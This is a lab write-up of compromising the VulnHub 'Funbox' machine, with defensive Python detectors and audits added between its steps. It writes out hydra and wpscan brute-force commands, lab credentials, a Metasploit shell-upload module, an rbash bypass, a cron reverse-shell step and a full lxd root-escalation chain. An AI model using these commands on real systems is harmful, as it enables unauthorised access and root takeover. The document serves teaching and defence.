MACHINE: FUNBOX
FROM: OSCP PLAYGROUND/VULNHUB
LEVEL: MEDIUM
Nmap
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 ProFTPD
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OPEN PORTS
21 FTP
22 SSH
80 web (includes robots.txt)
ENUMERATION
PORT 21
It's an FTP port, so try anonymous login; anonymous login is not allowed on this machine (it asks for a password)
PORT 22
It's a standard SSH port, version OpenSSH 8.2p1, so nothing is vulnerable there
PORT 80
When I access that machine through the web it redirects to this domain: http://funbox.fritz.box/
so we add this domain to our /etc/hosts
now it works
WordPress Site
In the background: wpscan running, directory bruteforcing running
Further enum
Let's check robots.txt
Found the /secret/ directory
FFUF and WPScan finished
wp-includes.php
ID3 and IXR have exploits but they won't work; maybe a rabbit hole, so I didn't spend much time on this
[wpscan finished]
Found two usernames
Let's brute force the password using wpscan; you can also use hydra
wpscan --url http://funbox.fritz.box/ -U admin -P /opt/rockyou.txt
Second user joe: password bruteforce
This time we use hydra to bruteforce :)
hydra -l joe -P /opt/rockyou.txt funbox.fritz.box -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Compared to wpscan, hydra is more lightweight and powerful
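From the defender's side, the password guessing above leaves a clear pattern in the web server's access log: a burst of POST requests to /wp-login.php from one source, most of them answered with 200 (WordPress re-renders the login form on failure) rather than the 302 redirect that hydra's S=Location success condition keys on. The following Python script is an added example, not part of the original write-up: it parses Apache combined-format lines and flags any source IP that accumulates more failed login POSTs than a threshold inside a sliding time window. The log lines are constructed for the example, the threshold and window are assumptions, and a real deployment would read /var/log/apache2/access.log instead of the inline sample.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic): six failed POSTs in six seconds
# from 10.0.0.5, one legitimate login from 10.0.0.9, then one success
# from 10.0.0.5 a few minutes later.
_LINE = ('{ip} - - [12/Mar/2021:10:00:{sec:02d} +0000] '
         '"POST /wp-login.php HTTP/1.1" {status} 4312 "-" "Mozilla/5.0"')
SAMPLE_LOG = "\n".join(
    [_LINE.format(ip="10.0.0.5", sec=s, status=200) for s in range(1, 7)]
    + [
        '10.0.0.9 - - [12/Mar/2021:10:00:30 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
        _LINE.format(ip="10.0.0.9", sec=31, status=302),
        '10.0.0.5 - - [12/Mar/2021:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    ]
)


def parse_events(log_text):
    """Return (ip, timestamp, status) for every POST to /wp-login.php."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-log line
        if m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["ip"], ts, int(m["status"])))
    return events


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Map source IP -> peak number of failed logins seen inside `window`.

    Only IPs whose peak reaches `threshold` are returned. A 200 response to
    the login POST means WordPress showed the form again (failure); a 302
    is the post-login redirect, so it is not counted as a failure.
    """
    failures = defaultdict(list)
    for ip, ts, status in parse_events(log_text):
        if status == 200:
            failures[ip].append(ts)

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        peak = 0
        for end in range(len(times)):
            # Slide the window start forward until it fits inside `window`.
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {count} failed wp-login POSTs within 60s")
```

The 200-versus-302 distinction is the same signal the hydra command relies on, just read from the other side; a successful 302 arriving from an IP that was alerting moments earlier is the event worth paging on, since it marks the guess that worked.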
CREDS
admin - iubire
joe - 12345
We logged in as joe, but we are just a regular user; we need the admin panel to get a reverse shell
So next we log in as admin (the second user)
admin
Yep, we are now admin
There are multiple ways to get a reverse shell:
convert the PHP file to a zip, then upload it as a plugin and install the plugin
or upload your PHP file at plugins/themes (sometimes won't work)
or use msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
EASIEST WAY
Upload your PHP file here, then access plugins/akismet/akismet.php
It is inactive, so activate it
Access this PHP file:
funbox.fritz.box/wp-content/plugins/akismet/akismet.php
We got a shell
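The path used here, editing a plugin's PHP through the dashboard after obtaining an admin login, is something a site owner can close outright: WordPress honours the DISALLOW_FILE_EDIT constant (removes the plugin and theme editor) and DISALLOW_FILE_MODS (additionally blocks plugin and theme uploads and updates from the dashboard). The Python checker below is an added example, not from the original post: it parses the define() statements in wp-config.php, ignores commented-out lines, and reports what is missing, with a weak and a hardened configuration constructed inline for comparison. The two constants are real WordPress settings; both sample configs are constructed for this example.

```python
import re

# Matches define( 'NAME', value ); with either quote style and a boolean,
# numeric or quoted-string value.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](?P<name>[A-Za-z_]+)['"]\s*,\s*"""
    r"""(?P<value>true|false|['"][^'"]*['"]|\d+)\s*\)""",
    re.IGNORECASE,
)

# Constants that close the dashboard file-edit path, with the reason.
HARDENING = {
    "DISALLOW_FILE_EDIT": "plugin/theme editor is still enabled",
    "DISALLOW_FILE_MODS": "plugin/theme upload and update from the dashboard still allowed",
}

# Constructed weak config: editor left enabled (only commented out), debug on.
WEAK_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'WP_DEBUG', true );
// define( 'DISALLOW_FILE_EDIT', true );
"""

# Constructed hardened config for comparison.
HARDENED_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'WP_DEBUG', false );
define( 'DISALLOW_FILE_EDIT', true );
define( 'DISALLOW_FILE_MODS', true );
"""


def parse_defines(wp_config_text):
    """Return {CONSTANT: python value} for every active define() in the file."""
    defines = {}
    for line in wp_config_text.splitlines():
        stripped = line.strip()
        # A commented-out define is not in effect; skip it rather than
        # report a setting that PHP never sees.
        if stripped.startswith(("//", "#", "/*", "*")):
            continue
        for m in DEFINE_RE.finditer(line):
            raw = m["value"]
            if raw.lower() == "true":
                value = True
            elif raw.lower() == "false":
                value = False
            elif raw.isdigit():
                value = int(raw)
            else:
                value = raw[1:-1]  # strip the quotes
            defines[m["name"].upper()] = value
    return defines


def audit_wp_config(wp_config_text):
    """Return a list of findings; an empty list means the checks all pass."""
    defines = parse_defines(wp_config_text)
    findings = []
    for name, why in HARDENING.items():
        if defines.get(name) is not True:
            findings.append(f"{name} is not true: {why}")
    if defines.get("WP_DEBUG") is True:
        findings.append("WP_DEBUG is true: error output can leak paths and queries")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_wp_config(cfg) or "OK")
```

DISALLOW_FILE_MODS is the stronger of the two and is the right choice when plugins are deployed from version control or a package manager rather than through the dashboard; with only DISALLOW_FILE_EDIT set, the zip-upload route listed above remains open to any admin account.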
HORIZONTAL PRIVILEGE ESCALATION
We have the password of joe
The machine has SSH
Let's log in via SSH
ssh joe@192.168.136.77 -t "bash --noprofile"
(to bypass the restricted bash shell)
User funny executes backup.sh via crontab, so I include a reverse shell in it
We are in, and this user is in the lxd group
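The cron job here is a textbook privilege path: a script that runs on a schedule as a more privileged user but is owned or writable by a less privileged one. The Python audit below is an added example, not the author's code: it parses a system crontab (the /etc/crontab layout with a user field, plus @reboot-style entries) and, for every job that runs as root, checks whether the script is owned by someone else or is group or world writable. The crontab text and the stat results are constructed stand-ins (a real run would call os.stat on each path), and the file names are illustrative.

```python
import stat

# Constructed /etc/crontab sample (not from the target machine).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
*/5 *  * * *   root    /home/funny/backup.sh
0 3   * * *   root    /usr/bin/backup-db.sh >/dev/null 2>&1
15 4  * * *   root    /opt/cleanup.sh
@reboot        funny   /home/funny/start.sh
"""

# Constructed stat results: path -> (owner, permission bits).
# Stand-in for os.stat() so the example runs offline.
SAMPLE_STAT = {
    "/home/funny/backup.sh": ("funny", 0o755),   # root runs it, funny owns it
    "/usr/bin/backup-db.sh": ("root", 0o755),    # fine
    "/opt/cleanup.sh": ("root", 0o777),          # root-owned but world-writable
    "/home/funny/start.sh": ("funny", 0o700),    # runs as funny, no gain
}


def parse_system_crontab(text):
    """Return [(user, command)] for every job line; skip comments and VAR=... lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            # @reboot / @daily style: <schedule> <user> <command>
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            user, command = fields[1], fields[2]
        else:
            # m h dom mon dow <user> <command>; SHELL=... lines fall short here
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        jobs.append((user, command))
    return jobs


def find_hijackable_jobs(crontab_text, stat_lookup):
    """Return [(script, owner, mode)] for root-run scripts a non-root user could change."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue  # only jobs running as root give a privilege gain
        script = command.split()[0]
        if script not in stat_lookup:
            continue  # e.g. a shell builtin or a path we could not stat
        owner, mode = stat_lookup[script]
        if owner != "root" or mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((script, owner, oct(mode)))
    return findings


if __name__ == "__main__":
    for script, owner, mode in find_hijackable_jobs(SAMPLE_CRONTAB, SAMPLE_STAT):
        print(f"root cron job runs {script} (owner={owner}, mode={mode})")
```

The same check should cover the parent directory of each script: a root-owned file in a directory writable by the user can be replaced outright, which the owner-and-mode test on the file alone does not catch.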
what is lxd?
It's similar to a Docker container: it offers a user experience similar to virtual machines, but using Linux containers instead.
Steps to exploit
We reach the target through a private VPN, so we can't use GitHub to clone the repo on it
so we download and build on our local machine and send the files to the victim machine via a Python HTTP server:
rootfs.squashfs and lxd.tar.xz
lxc init alpine privesc -c security.privileged=true (if you get an error, run lxd init first)
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
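What makes the last step possible is not a bug in lxd but group membership: anyone in the lxd group can start a privileged container with the host's root filesystem mounted, so lxd membership is root-equivalent in the same way docker or sudo membership is. The Python audit below is an added example, not part of the write-up: it parses /etc/group and /etc/passwd text and lists every user in a root-equivalent group together with their login shell, so a finding is easy to act on. The set of groups treated as root-equivalent is an assumption, and both files are constructed samples.

```python
# Groups whose membership is treated as equivalent to root (assumption).
ROOT_EQUIVALENT_GROUPS = {
    "lxd": "can launch a privileged container with / mounted",
    "docker": "docker socket access is equivalent to root",
    "sudo": "sudo membership",
    "disk": "raw block-device access bypasses file permissions",
}

# Constructed /etc/group sample.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
lxd:x:118:funny
docker:x:999:
users:x:100:joe,funny
"""

# Constructed /etc/passwd sample; joe gets a restricted shell, funny a full one.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
joe:x:1000:1000::/home/joe:/bin/rbash
funny:x:1001:1001::/home/funny:/bin/bash
www-data:x:33:33::/var/www:/usr/sbin/nologin
"""


def parse_group(text):
    """Return {group: set(supplementary members)} from /etc/group content."""
    members = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:
            continue  # malformed or blank line
        name, _, _, member_list = parts
        members[name] = {m for m in member_list.split(",") if m}
    return members


def parse_passwd(text):
    """Return {user: login shell} from /etc/passwd content."""
    shells = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        shells[parts[0]] = parts[6]
    return shells


def audit_root_equivalent(group_text, passwd_text):
    """List every (user, group, shell, reason) where group is root-equivalent."""
    groups = parse_group(group_text)
    shells = parse_passwd(passwd_text)
    findings = []
    for group, why in ROOT_EQUIVALENT_GROUPS.items():
        for user in sorted(groups.get(group, ())):
            findings.append({
                "user": user,
                "group": group,
                "shell": shells.get(user, "?"),
                "why": why,
            })
    return findings


if __name__ == "__main__":
    for f in audit_root_equivalent(SAMPLE_GROUP, SAMPLE_PASSWD):
        print(f"{f['user']} in {f['group']} (shell {f['shell']}): {f['why']}")
```

Note that a restricted login shell such as rbash does not reduce the finding: the ssh -t "bash --noprofile" step earlier in this write-up shows why a shell restriction is not a security boundary, so the audit reports the membership regardless of shell. Membership via the primary GID in /etc/passwd is not covered here; a complete check would fold that in as well.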
That's it :)